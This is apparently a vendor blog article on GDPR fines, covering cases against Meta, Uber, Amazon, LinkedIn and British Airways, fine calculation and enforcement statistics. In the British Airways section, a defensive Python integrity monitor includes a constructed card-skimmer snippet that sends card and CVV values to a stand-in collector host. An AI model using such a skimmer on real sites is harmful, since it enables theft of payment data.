
If there was ever any doubt about how seriously regulators take data protection, recent years have put that to rest. Since the General Data Protection Regulation (GDPR) came into effect in 2018, enforcement has reached an all-time high, and fines now total billions of euros.
Big names like Uber, Meta, and LinkedIn have been hit with some of the largest penalties in privacy law history, showing that no company is too big to be held accountable.
Meanwhile, data protection authorities are receiving more consumer complaints than ever, signaling a shift in how individuals defend their digital rights.
Let’s break down the GDPR fines.
Major GDPR Penalties for Non-Compliance
Meta
- Meta (Facebook’s parent company) has received a string of penalties from the Irish Data Protection Commission (DPC), its lead regulator in the EU, plus one from the European Commission that falls under the Digital Markets Act rather than the GDPR:
Date | Amount | Authority | Reason |
---|---|---|---|
September 2022 | €405 million | Irish DPC | Mishandling of children’s data on Instagram (GDPR) |
January 2023 | €390 million | Irish DPC | Forcing users to accept personalized ads as part of the terms of service (GDPR) |
May 2023 | €1.2 billion | Irish DPC, following an EDPB binding decision | Unlawful data transfers to the US (GDPR) |
September 2024 | €91 million | Irish DPC | Storing user passwords in plain text (GDPR) |
December 2024 | €251 million | Irish DPC | 2018 data breach exposing user access tokens (GDPR) |
April 2025 | €200 million | European Commission | “Consent or pay” model failed to offer users a genuine choice over data use (Digital Markets Act) |
Uber
- Uber has been fined three times by the Dutch Data Protection Authority (Autoriteit Persoonsgegevens, AP), its lead regulator in the EU: in 2018, on December 11, 2023 and on July 22, 2024 (the last two just seven months apart).
- The 2018 fine concerned a large data breach that Uber did not report within 72 hours of becoming aware of it, as the GDPR requires.
- The investigations behind the second and third fines began after more than 170 French Uber drivers filed complaints. The €10 million fine was for a lack of transparency towards drivers: Uber did not say how long it kept their data or which countries outside the EU it was sent to, and made it unnecessarily hard for drivers to exercise their right of access.
- The €290 million fine was for transferring sensitive personal data about European drivers (account and location data, payment details, identity documents and in some cases criminal and medical records) to Uber’s US headquarters for more than two years without appropriate safeguards, after the EU-US Privacy Shield had been invalidated. A second major fine so soon after the first shows that regulators do not tolerate repeated violations.
Date | Fine Amount | Authority | Reason |
---|---|---|---|
2018 | €600,000 | Dutch DPA (AP) | Late notification of a data breach |
11 December 2023 | €10 million | Dutch DPA (AP) | Failure to inform drivers about retention and transfers; obstruction of access requests |
22 July 2024 | €290 million | Dutch DPA (AP) | Transfers of driver data to the US without appropriate safeguards |
Apple
- Apple received the three penalties below between 2022 and 2025, totaling more than €650 million. None of them is a GDPR fine as such: two are competition decisions and one is an ePrivacy decision.
- The violations range from setting advertising identifiers without valid consent to anti-competitive behavior.
- The largest, €500 million from the European Commission in April 2025, was imposed under the Digital Markets Act for anti-steering practices. The French Competition Authority’s €150 million fine of March 2025 concerned the App Tracking Transparency (ATT) consent prompt, which it found gave Apple’s own services an unfair advantage over third-party apps. The only strictly privacy decision is the €8 million CNIL fine of December 2022: Apple set and read the advertising identifier (IDFA) on iOS devices without first obtaining valid user consent.
Date | Fine Amount | Authority | Reason |
---|---|---|---|
29 December 2022 | €8 million | CNIL (France) | Failure to obtain valid consent for ad identifiers (IDFA) on iOS devices; ePrivacy violation |
31 March 2025 | €150 million | French Competition Authority | Abuse of dominant position via ATT; unfair advantage for Apple’s own services |
23 April 2025 | €500 million | European Commission | Breach of DMA anti-steering rules; restricting developers from informing users about alternatives |
Amazon
- Amazon’s €746 million fine was imposed on July 15, 2021 by Luxembourg’s National Commission for Data Protection (CNPD). It survived appeal: the Luxembourg Administrative Tribunal upheld it on March 18, 2025.
- Investigators found that Amazon unlawfully processed personal data for personalized advertising without valid user consent.
- The case shows that national regulators across Europe, not only the Irish DPC, are actively stepping up enforcement.
LinkedIn
- The Irish Data Protection Commission (DPC) is the lead supervisory authority for the many tech companies whose EU headquarters are in Ireland. In October 2024 it issued a large fine against LinkedIn.
- The DPC concluded that LinkedIn unlawfully processed users’ personal data for behavioral analysis and targeted advertising. LinkedIn had cited consent, legitimate interests and contractual necessity as its legal bases; the DPC found none of them valid for this processing.
- The fine was €310 million for violations of the EU’s General Data Protection Regulation (GDPR).
- The decision reinforces Ireland’s role as a major enforcer of GDPR in the tech sector.
British Airways
- The UK Information Commissioner’s Office (ICO) fined British Airways on October 16, 2020 for a major personal data breach.
- The ICO found that BA had failed to implement basic security measures that would have prevented or limited the attack.
- The breach occurred in 2018 and affected over 400,000 customers and staff, exposing personal and payment card details. The attackers gained access to BA’s network and modified a JavaScript file on the airline’s website so that data entered on the payment page was also sent to a domain they controlled. The skimming went undetected for over two months.
- The original penalty notice of £183.39 million was reduced to £20 million, taking into account BA’s representations and cooperation and the financial impact of COVID-19.
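The BA breach above was a web-skimming attack: a change to a script the site already served, with captured card data sent to an outside domain. One control that surfaces this is a periodic integrity check of every script the checkout page loads against a known-good baseline, combined with a check for any URL in those scripts that points outside the site’s own hosts. The following is an added example written for this page, not code from BA or the ICO; the page HTML, the script bodies, the host names (www.example-airline.test, checkout-collector.invalid) and the function names are all constructed for illustration.

```python
import hashlib
import re
from urllib.parse import urlparse

# Regexes are enough for this constructed example; a real monitor would use an HTML parser.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.IGNORECASE)

# Assumed site details: the checkout page's own host and the hosts it may legitimately use.
PAGE_HOST = "www.example-airline.test"
ALLOWED_HOSTS = {PAGE_HOST, "cdn.example-airline.test"}


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def extract_scripts(html):
    """Return (src, inline_body) for every <script> element, in page order."""
    scripts = []
    for attrs, body in SCRIPT_RE.findall(html):
        match = SRC_RE.search(attrs)
        scripts.append((match.group(1) if match else None, body.strip()))
    return scripts


def host_of(url, page_host):
    """Hostname a URL points at; a relative URL resolves to the page's own host."""
    return urlparse(url).hostname or page_host


def build_baseline(html, fetched):
    """Hash every script on a known-good copy of the page.
    `fetched` maps each external src to the file served at that URL
    (fetched over HTTPS in real use; constructed strings here)."""
    baseline = {"inline": set(), "external": {}}
    for src, body in extract_scripts(html):
        if src is None:
            baseline["inline"].add(sha256_hex(body))
        else:
            baseline["external"][src] = sha256_hex(fetched[src])
    return baseline


def audit(html, fetched, baseline, page_host=PAGE_HOST, allowed_hosts=ALLOWED_HOSTS):
    """Compare the live page and its scripts against the baseline.
    Returns a list of findings; an empty list means nothing has drifted."""
    findings = []
    for src, body in extract_scripts(html):
        if src is None:
            label = "inline script"
            if sha256_hex(body) not in baseline["inline"]:
                findings.append(f"{label} not in baseline")
        else:
            label = f"external script {src}"
            if host_of(src, page_host) not in allowed_hosts:
                findings.append(f"{label} loaded from unexpected host")
            body = fetched.get(src, "")
            expected = baseline["external"].get(src)
            if expected is None:
                findings.append(f"{label} not in baseline")
            elif sha256_hex(body) != expected:
                findings.append(f"{label} changed since baseline")
        # For both kinds of script: a URL pointing outside the allowed hosts is
        # how a skimmer ships captured card data off the page.
        for url in URL_RE.findall(body):
            host = host_of(url, page_host)
            if host not in allowed_hosts:
                findings.append(f"{label} references unexpected host {host}")
    return findings


# Constructed sample page: a payment form, one external script served from the
# site's own host, and one inline script.
CLEAN_PAGE = """<html><body>
<form id="payment"><input name="card"><input name="cvv"></form>
<script src="/js/modernizr-2.6.2.min.js"></script>
<script>document.getElementById("payment").addEventListener("submit", validate);</script>
</body></html>"""
MODERNIZR_SRC = "/js/modernizr-2.6.2.min.js"
CLEAN_MODERNIZR = "window.Modernizr = {version: '2.6.2'};"

# Constructed tampered copy: the page HTML is unchanged and the script still
# comes from the site's own host; only the served file differs.
SKIMMED_MODERNIZR = CLEAN_MODERNIZR + (
    "document.getElementById('payment').addEventListener('submit', function () {"
    "  var d = JSON.stringify({c: card.value, v: cvv.value});"
    "  navigator.sendBeacon('https://checkout-collector.invalid/gate', d);"
    "});"
)


def demo():
    """Baseline from the clean copy, then audit a clean and a tampered fetch."""
    baseline = build_baseline(CLEAN_PAGE, {MODERNIZR_SRC: CLEAN_MODERNIZR})
    clean = audit(CLEAN_PAGE, {MODERNIZR_SRC: CLEAN_MODERNIZR}, baseline)
    tampered = audit(CLEAN_PAGE, {MODERNIZR_SRC: SKIMMED_MODERNIZR}, baseline)
    return clean, tampered
```

The host allowlist alone would not have caught the BA case, because the modified file was served from the airline’s own domain; it is the hash comparison that flags the changed file, and the URL scan that points at where the data was going. In production the same idea is enforced in the browser with Subresource Integrity (`integrity=` attributes on static scripts) and a Content Security Policy whose `connect-src` and `form-action` directives restrict where page data may be sent, with the monitor above as the detective control behind them.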
Criteo
- On June 15, 2023, the French Data Protection Authority (CNIL) fined Criteo €40 million for multiple GDPR violations.
- The investigation followed 2018 complaints by NOYB and Privacy International about Criteo’s ad-tracking and behavioral targeting practices. Criteo relied on its partner websites to obtain consent for its tracking cookie but never checked that they actually did, so it could not show that users had given valid consent for personalized ads.
GDPR Fines for Small Businesses
GDPR applies to every organization that processes the personal data of individuals in the EU, regardless of size, so small and medium-sized businesses (SMBs) can be fined too. The amounts are usually far lower than those imposed on multinationals, but still large enough to hurt a small company’s finances and reputation.
The examples below are UK Information Commissioner’s Office (ICO) penalties, denominated in pounds, for direct-marketing conduct in 2016 and 2017. They were issued under the Privacy and Electronic Communications Regulations (PECR), the UK rules on marketing calls, texts and emails that sit alongside the GDPR, and they show the pattern regulators punish at this scale: unsolicited marketing, bought-in data whose consent nobody verified, and no corrective action after a first warning.
Examples of Fines for Small Businesses
- Tax Return Limited: fined £200,000 for sending millions of unsolicited marketing text messages between July 2016 and October 2017 without valid consent. The company relied on third-party data without verifying that permission had been given; the ICO found the consent wording unclear and noted that the privacy policies of the data sources did not name the companies that would receive the data.
- DM Design Bedrooms Ltd.: fined £160,000 for unsolicited marketing calls to numbers registered with the Telephone Preference Service (TPS) between April and November 2017. It failed to screen its call lists properly, ignored do-not-call requirements and relied on unchecked data sources. This was its second fine, indicating that no corrective action had been taken after the first.
- Lifestyle Marketing (Mother & Baby) Ltd.: fined £140,000 for selling the personal data of over a million people to Experian, which was later used by the Labour Party to profile new mothers before the 2017 UK general election. Users had not been told their data could be used for political marketing.
- Secure Home Systems: fined £80,000 for marketing calls to TPS-registered consumers without proper screening. The company relied on third-party data without checking it and failed to keep its database up to date, which generated many complaints.
- Eldon Insurance Services Limited: fined £60,000 for two unlawful marketing campaigns, one involving over one million emails sent without valid consent and the other nearly 300,000 political messages sent using Eldon Insurance customer data. The company had failed to keep its insurance and political data separate.
Common Reasons for SMB Fines
- Unlawful transfer of data to third parties.
- Sending marketing communications without proper consent.
- Failing to obtain valid consent for data processing.
- Inadequate data security measures leading to breaches.
- Collecting or retaining unnecessary personal data.
GDPR Fines for Individuals
Individuals can also be fined under GDPR, but this is rare and typically reserved for serious or intentional violations.
The regulation applies to any controller or processor, and that can be a person as well as an organization: sole traders, business owners and professionals who handle personal data in their own name are all within scope.
Individuals acting purely for personal or household purposes are not subject to fines.
Fines imposed on individuals have typically ranged from a few thousand euros up to around €10,000. Typical triggers are sending personal data to the wrong recipient, disclosing sensitive information without redacting it, or ignoring data protection responsibilities at work.
How GDPR Fines Are Calculated
GDPR fines are not fixed amounts. They are determined case by case, using a structured methodology intended to make them effective, proportionate and dissuasive.
Supervisory authorities follow the five-step process set out in the European Data Protection Board’s Guidelines 04/2022 on the calculation of administrative fines:
- Identify the infringing behavior: the authority determines which processing operations violated the law and whether the case involves one infringement or several.
- Set a starting point: this is based on the nature and seriousness of the violation, the specific GDPR provisions breached, and the undertaking’s global turnover.
- Adjust for aggravating or mitigating factors, for example:
  - past violations or repeat offenses (aggravating)
  - cooperation, fast remediation or technical improvements (mitigating)
- Apply the legal maximum: the resulting amount must not exceed the GDPR’s cap. There are two tiers, depending on which provisions were breached:
  - Lower tier (Article 83(4)): up to €10 million or 2% of global annual turnover, whichever is higher, for violations such as insufficient security measures, failure to notify breaches, or administrative non-compliance (e.g., record-keeping).
  - Higher tier (Article 83(5)): up to €20 million or 4% of global annual turnover, whichever is higher, for severe breaches including unlawful data processing, violations of data subject rights (e.g., consent, access, erasure) and unauthorized international data transfers.
- Final review for effectiveness, proportionality and deterrence: the authority checks that the fine is effective, proportionate to the severity of the violation, and strong enough to deter future non-compliance.
There is no minimum fine. Each case is assessed individually, and the turnover used for the cap is that of the whole undertaking (the corporate group), not just the local subsidiary that committed the infringement.

The Largest GDPR Fine to Date
The biggest GDPR fine to date of €1.2 billion was imposed on Meta (Facebook’s parent company) by the Irish Data Protection Commission (DPC) in May 2023.
The fine stemmed from Meta’s unlawful transfer of European users’ personal data to the United States without sufficient safeguards and violating GDPR’s rules on international data transfers.
Coming in second place is Amazon, fined €746 million in July 2021 by Luxembourg’s data protection authority for processing personal data for behavioral advertising without valid user consent.
In third place sits Meta’s Instagram, hit with a €405 million fine in September 2022. This case focused on the mishandling of children’s personal data, including public default settings for underage accounts and the exposure of contact information.

The Latest GDPR Fine
In May 2025, the Spanish Data Protection Authority (AEPD) fined Orange Espagne €1.2 million over a SIM-swapping fraud. An employee at a franchise store issued a duplicate SIM card without the customer’s consent, which gave the attackers control of the victim’s phone number and let them steal money from the victim’s accounts; the AEPD treated this as unlawful processing of the customer’s personal data.
GDPR Fine Statistics
- Since its enforcement in May 2018, GDPR fines have reached approximately €5.88 billion by January 2025 (GDPR Local, 2025)
- The Irish Data Protection Commission (DPC) is the most active regulator, issuing €3.5 billion in fines, which is over four times more than the next highest authority, the Luxembourg Data Protection Authority (Infosecurity Magazine, 2025)
- The largest single GDPR fine to date is €1.2 billion, imposed on Meta (Facebook) in May 2023 for transferring EU user data to the US without adequate safeguards (Data Privacy Manager, 2025)
- The media, telecoms, and broadcasting sector has faced the highest total fines, around €4 billion since 2018 (Statista, 2025)
- Despite the high total value of fines, only about 1.3% of cases before EU Data Protection Authorities (DPAs) result in a fine (NOYB, 2025)
Why These Fines Matter
1. Record-breaking Enforcement Numbers
- GDPR fines have totaled several billion euros since 2018, and enforcement is still increasing.
- The penalties are getting bigger and more frequent, signaling that regulators aren’t holding back.
- Repeat violations are treated by regulators as a sign of systemic non-compliance and attract higher fines.
2. Consumers Are Fighting for Their Rights
- European data protection agencies report a growing number of complaints from individuals who are becoming more aware of their privacy rights.
- More complaints = more investigations = more enforcement actions.
3. Big Tech Is Feeling the Heat
- With major platforms like Meta, Uber, and LinkedIn under scrutiny, regulators are proving that even the biggest players must follow the rules.
- Companies can no longer afford to view GDPR as just another compliance checkbox—violating it now comes with a real financial risk.
4. Consent and Transparency Are Under the Microscope
- Many of the most significant fines are tied to failures in obtaining valid user consent and providing clear information about data use.
- Regulators are cracking down on companies that collect data without proper user permission or fail to explain what they’re doing with it.
- Consent mode (offered by Google and Microsoft for their tags) adjusts how those tags collect and use data according to the consent a visitor has given, so a site can stay compliant with GDPR and other privacy regulations while keeping its analytics and advertising working.
- Both Google Consent Mode and Microsoft Consent Mode are now mandatory for continued access to their important advertising features in Europe, making proper implementation a compliance requirement for businesses using their platforms.
- Using a Consent Management Platform (CMP) like Cookiebot helps businesses collect, manage, and document valid user consent in line with GDPR and other privacy laws.
The Future of GDPR Fines
Regulators are only getting stricter, consumers are demanding greater accountability, and businesses can’t afford to treat data privacy as an afterthought. With fines reaching historic levels, the message is loud and clear: Comply with GDPR or pay the price.